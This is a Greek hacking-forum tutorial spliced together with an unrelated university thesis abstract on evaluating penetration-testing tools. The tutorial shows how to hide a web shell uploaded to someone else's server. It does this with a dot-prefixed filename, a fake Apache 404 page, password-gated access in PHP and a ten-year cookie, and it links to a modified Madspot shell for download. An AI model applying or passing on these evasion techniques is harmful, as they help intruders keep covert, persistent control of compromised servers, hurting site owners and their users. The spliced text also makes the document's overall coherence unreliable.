Γεια σας! Σήμερα θα σας δείξω μερικά βήματα έτσι ώστε να κάνετε (σχεδόν) αόρατο το shell σας που πιθανώς έχετε ανεβάσει κάπου![hide]1. Κάνουμε rename το shell μας σε μορφή .onoma.php πχ αν ήταν: shell.php το κάνουμε .shell.php έτσι ώστε να μην εμφανίζεται με την εντολή ls σκέτη. 2. Λοιπόν εδώ θεωρούμε 2 κωδικούς τους οποίους ξέρουμε μόνο εμείς. Εγώ θα χρησιμοποιήσω τους κωδικούς: pass1 και pass2 Ανοίγουμε το php shell μας και ορίζουμε τις μεταβλητές με τον κωδικό μας πάνω πάνω: $p1 = "pass1"; $p2 = "pass2"; Στο shell αν δεν είναι της μορφής server.com/.shell.php?pass1=pass2 θα πετάει 404 error έτσι ώστε να μην καταλάβει κανείς τίποτα..δηλαδή αν πάει να μπει κάποιος έτσι: server.com/shell.php θα του πετάξει 404 error.Αυτό θα γίνει μέσω php, πάμε και γράφουμε λίγο php κώδικα: if($_GET['p1'] == $p1 && $_GET['p2'] == $p2) { //Kwdikas tou shell edw } else { //Edw einai o kwdikas gia to 404 Not Found?> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL <?echo $_SERVER['SCRIPT_NAME']?> was not found on this server.</p> <hr> <address>Apache/2.4.7 (Ubuntu) Server at localhost Port 80</address> </body></html> <?}?> Επειδή όμως σε μερικά shell ίσως να μην υπάρχει ομαλή λειτουργία(μπορεί όταν πατάνε πχ το κουμπί για την επεξεργασία ή προβολή αρχείου να <<βγαίνει>> το &p1=pass1&p2=pass2 απ το λινκ μας(δηλαδη η ταυτοποιηση του κωδικου μας) με αποτέλεσμα να μας πετάει πάλι στο 404 Not Found, θα προστέσουμε λίγο ακόμα κώδικα έτσι ώστε να μπαίνουν σε cookie οι κωδικοί και να μην ξαναχρειαστεί να τους βάλουμε στο link.Έτσι λοιπόν προσθέτουμε μετά το if($_GET['p1'] == $p1 && $_GET['p2'] == $p2) { τον εξής κώδικα: if($_COOKIE['p1'] != $p1) { //Dhladh an o xrhsths auth thn stigmh exei tous kwdikous sto link kai oxi se cookie setcookie("p1",$_GET['p1'], time() + (10 * 365 * 24 * 60 * 60)); setcookie("p2",$_GET['p2'], time() + (10 * 365 * 24 * 60 * 60)); }και ύστερα κάνουμε μια τροποποίηση στην if() έτσι ώστε να ελέγχει για cookie εναλλακτικά(αν δεν υπάρχουν οι κωδικοί στο link): if(($_GET['p1'] == $p1 && $_GET['p2'] == $p2) || ($_COOKIE['p1'] == $p1 && $_COOKIE['p2'] == $p2)) { και τέλος!Ας κάνουμε έναν έλεγχο.. Link: .madspot.php: 404 error και λογικό αφού δεν έχουμε βάλει κωδικο.. Link: .madspot.php?p1=pass1&p2=pass2 Τώρα αφού βάλαμε τους κωδικούς φόρτωσε το shell και ταυτόχρονα πέρασε τους κωδικούς μας σε cookie, πάμε να δοκιμάσουμε πάλι σκέτο link: Link: .madspot.php(μετά απ' το όρισμα των κωδικών): Τώρα βλέπουμε πως λειτουργεί κανονικά αφού έχουν οριστεί σε cookie οι κωδικοί μας και δεν χρειάζεται πλέον να τους βάζουμε στο link. Screenshot από τον server εκτελόντας την εντολή ls: Όπως βλέπετε με την εντολή ls σκέτη δεν εμφανίζεται το shell αφού ξεκινάει από . (κρυφό αρχείο) Αυτό ήταν! Αν σας μπέρδεψα μπορείτε να κατεβάσετε μια έτοιμη τροποποίηση που έκανα στο Madspot Shell: http://www.mediafire.com/download/dcgj5eh360rg3s4/modified_madspot_kwnos100.rar [/hide]Η μέθοδος είναι δικιά μου και ανήκει στο GreekHacking.com Ότι απορία έχετε αφήστε σχόλιο

Tο διαδίκτυο αποτελεί σήμερα απαραίτητο συστατικό της καθημερινής ζωής για τους περισσότερους ανθρώπους. H αξιοποίηση των υπηρεσιών του διαδικτύου για την υποστήριξη των οικονομικών και κοινωνικών δραστηριοτήτων γίνεται κυρίως μέσω των διαδικτυακών εφαρμογών, οι οποίες εξελίσσονται ραγδαία. Όμως, όσο εξαπλώνεται η χρήση των διαδικτυακών εφαρμογών, τόσο περισσότερο γίνονται στόχος επιθέσεων από κακόβουλους χρήστες, οι οποίο προσπαθούν να εκμεταλλευτούν τις αδυναμίες στον κώδικα και τις ρυθμίσεις για την επιτέλεση των σκοπών τους. Επομένως, η ασφάλεια των διαδικτυακών εφαρμογών αποτελεί μια κρίσιμη παράμετρο για την αποδοχή και αξιοποίησή τους. Μια διαδεδομένη πρακτική για την ενίσχυση της ασφάλειας των διαδικτυακών εφαρμογών είναι η πραγματοποίηση δοκιμών διείσδυσης από ειδικούς της ασφάλειας, με τη συγκατάθεση των ιδιοκτητών τους. Οι δοκιμές αποσκοπούν στο να εντοπισθούν τυχόν ευπάθειες και να διαπιστωθεί η ανάγκη λήψης μέτρων προστασίας. Για το σκοπό αυτό, έχουν αναπτυχθεί πολλά και διάφορα εργαλεία για δοκιμές διείσδυσης, τα οποία δεν παρέχουν την ίδια αποτελεσματικότητα και πληρότητα κάλυψης των αναγκών ελέγχου ασφάλειας των εφαρμογών ιστού. Αντικείμενο της παρούσας διπλωματικής εργασίας αποτελεί η έρευνα, η καταγραφή, η ταξινόμηση και η αξιολόγηση των αντιπροσωπευτικών εργαλείων διείσδυσης, κυρίως στη βάση της εφαρμογής τους στο πλαίσιο μιας μεθοδολογίας επίθεσης. Στο πλαίσιο μιας τυποποιημένης διαδικασίας δοκιμών διείσδυσης, σύμφωνα με τη συγκεκριμένη μεθοδολογία επίθεσης, γίνεται προσδιορισμός των ποιοτικών κριτηρίων αξιολόγησης εργαλείων διείσδυσης σε κάθε στάδιο της μεθοδολογίας. Από την οργανωμένη εφαρμογή των εργαλείων δοκιμών διείσδυσης με μια ολοκληρωμένη δοκιμή διείσδυσης σε πραγματικό στόχο, προκύπτουν συμπεράσματα τα οποία αποτυπώνονται σε μια συνολική συγκριτική αξιολόγησή τους. Αξιολόγηση εργαλείων Penetration Testing για Web εφαρμογές - Iatropoulos Ioannis Msc2017.pdf Πηγή: ΨΗΦΙΔΑ - Ψηφιακή Βιβλιοθήκη και Ιδρυματικό Αποθετήριο του Πανεπιστημίου Μακεδονίας